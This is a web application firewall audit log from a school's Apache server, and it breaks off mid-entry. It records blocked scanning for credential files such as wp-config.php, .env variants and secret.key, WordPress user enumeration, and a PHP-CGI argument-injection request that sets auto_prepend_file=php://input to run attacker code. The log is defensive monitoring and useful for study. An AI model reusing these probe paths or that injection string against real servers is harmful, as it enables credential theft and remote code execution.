Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --380a8865-Z-- --cde02828-A-- [24/May/2025:18:06:30 +0700] aDGoNvmzt4abyoi_U9kAdwAAAIs 103.236.140.4 56696 103.236.140.4 8181 --cde02828-B-- GET /config/backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --cde02828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cde02828-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790971858 1957 (- - -) Stopwatch2: 1748084790971858 1957; combined=760, p1=315, p2=400, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cde02828-Z-- --e57cb91d-A-- [24/May/2025:18:06:33 +0700] aDGoOfmzt4abyoi_U9kAfwAAAIo 103.236.140.4 56746 103.236.140.4 8181 --e57cb91d-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --e57cb91d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e57cb91d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793201690 705 (- - -) Stopwatch2: 1748084793201690 705; combined=257, p1=223, p2=0, p3=0, p4=0, p5=33, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e57cb91d-Z-- --d60bb64d-A-- [24/May/2025:18:06:33 +0700] aDGoOTvI5DIWBJ2mFG5OJAAAAMg 103.236.140.4 56748 103.236.140.4 8181 --d60bb64d-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --d60bb64d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d60bb64d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793418809 777 (- - -) Stopwatch2: 1748084793418809 777; combined=326, p1=240, p2=0, p3=0, p4=0, p5=86, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d60bb64d-Z-- --8a13d312-A-- [24/May/2025:18:06:33 +0700] aDGoOeO2UzDOKMmK0i6lJwAAAAE 103.236.140.4 56750 103.236.140.4 8181 --8a13d312-B-- GET /wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --8a13d312-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a13d312-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793454531 770 (- - -) Stopwatch2: 1748084793454531 770; combined=285, p1=250, p2=0, p3=0, p4=0, p5=34, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a13d312-Z-- --69738711-A-- [24/May/2025:18:06:33 +0700] aDGoOeO2UzDOKMmK0i6lKAAAABg 103.236.140.4 56752 103.236.140.4 8181 --69738711-B-- GET /.wp-config.php.swp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --69738711-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69738711-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793483956 736 (- - -) Stopwatch2: 1748084793483956 736; combined=271, p1=237, p2=0, p3=0, p4=0, p5=33, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69738711-Z-- --fada922f-A-- [24/May/2025:18:06:33 +0700] aDGoOeO2UzDOKMmK0i6lKQAAAAM 103.236.140.4 56754 103.236.140.4 8181 --fada922f-B-- GET /config/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --fada922f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fada922f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793644477 714 (- - -) Stopwatch2: 1748084793644477 714; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fada922f-Z-- --48161d44-A-- [24/May/2025:18:06:33 +0700] aDGoOeO2UzDOKMmK0i6lKgAAAAg 103.236.140.4 56764 103.236.140.4 8181 --48161d44-B-- GET /web.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --48161d44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48161d44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793923607 765 (- - -) Stopwatch2: 1748084793923607 765; combined=286, p1=242, p2=0, p3=0, p4=0, p5=43, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48161d44-Z-- --82bc4038-A-- [24/May/2025:18:06:34 +0700] aDGoOuO2UzDOKMmK0i6lLAAAAAI 103.236.140.4 56782 103.236.140.4 8181 --82bc4038-B-- GET /.env.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --82bc4038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82bc4038-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084794178272 808 (- - -) Stopwatch2: 1748084794178272 808; combined=275, p1=238, p2=0, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82bc4038-Z-- --c6ae5908-A-- [24/May/2025:18:06:34 +0700] aDGoOuO2UzDOKMmK0i6lLQAAAA0 103.236.140.4 56784 103.236.140.4 8181 --c6ae5908-B-- GET /.env.dev HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --c6ae5908-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6ae5908-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084794375695 779 (- - -) Stopwatch2: 1748084794375695 779; combined=297, p1=256, p2=0, p3=0, p4=0, p5=40, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6ae5908-Z-- --90f44343-A-- [24/May/2025:18:06:34 +0700] aDGoOuO2UzDOKMmK0i6lLgAAABE 103.236.140.4 56786 103.236.140.4 8181 --90f44343-B-- GET /.env.test HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --90f44343-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90f44343-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084794408366 676 (- - -) Stopwatch2: 1748084794408366 676; combined=247, p1=217, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90f44343-Z-- --7d60b442-A-- [24/May/2025:18:06:34 +0700] aDGoOuO2UzDOKMmK0i6lLwAAABc 103.236.140.4 56788 103.236.140.4 8181 --7d60b442-B-- GET /.env.staging HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --7d60b442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d60b442-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084794506300 653 (- - -) Stopwatch2: 1748084794506300 653; combined=247, p1=216, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d60b442-Z-- --37cb573f-A-- [24/May/2025:18:06:35 +0700] aDGoO-O2UzDOKMmK0i6lNwAAAAA 103.236.140.4 56810 103.236.140.4 8181 --37cb573f-B-- GET /site.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --37cb573f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37cb573f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084795319677 1748 (- - -) Stopwatch2: 1748084795319677 1748; combined=628, p1=310, p2=291, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37cb573f-Z-- --aba5f532-A-- [24/May/2025:18:06:35 +0700] aDGoO-unkxaVeh4NwhbTqwAAAEw 103.236.140.4 56828 103.236.140.4 8181 --aba5f532-B-- GET /.profile HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --aba5f532-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aba5f532-H-- Message: Access denied with code 403 (phase 2). String match "/.profile" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6621"] [id "243320"] [rev "1"] [msg "COMODO WAF: Information disclosure vulnerability in Cloud Foundry PHP Buildpack (aka php-buildpack) before 4.3.18 and PHP Buildpack Cf-release before 242, as used in Pivotal Cloud Foundry (PCF) Elastic Runtime before 1.6.38 and 1.7.x before 1.7.19 and other products (CVE-2016-6639)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084795877087 2568 (- - -) Stopwatch2: 1748084795877087 2568; combined=1560, p1=326, p2=1207, p3=0, p4=0, p5=27, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aba5f532-Z-- --07c17962-A-- [24/May/2025:18:06:36 +0700] aDGoPOO2UzDOKMmK0i6lPwAAABc 103.236.140.4 56836 103.236.140.4 8181 --07c17962-B-- GET /secret.key HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --07c17962-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c17962-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084796056548 1888 (- - -) Stopwatch2: 1748084796056548 1888; combined=664, p1=281, p2=355, p3=0, p4=0, p5=27, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c17962-Z-- --a8344a3f-A-- [24/May/2025:18:07:31 +0700] aDGoc-O2UzDOKMmK0i6ldwAAAAQ 103.236.140.4 57128 103.236.140.4 8181 --a8344a3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.20.73.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.20.73.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a8344a3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8344a3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084851547148 3357 (- - -) Stopwatch2: 1748084851547148 3357; combined=1465, p1=508, p2=925, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8344a3f-Z-- --04ed026e-A-- [24/May/2025:18:14:56 +0700] aDGqMOO2UzDOKMmK0i6l_gAAAAw 103.236.140.4 59078 103.236.140.4 8181 --04ed026e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --04ed026e-C-- --04ed026e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04ed026e-E-- --04ed026e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748085296298888 3668 (- - -) Stopwatch2: 1748085296298888 3668; combined=2718, p1=462, p2=2224, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04ed026e-Z-- --d4a5bb42-A-- [24/May/2025:18:34:02 +0700] aDGuquunkxaVeh4NwhbXcAAAAE4 103.236.140.4 36670 103.236.140.4 8181 --d4a5bb42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.235.166.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.235.166.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d4a5bb42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4a5bb42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 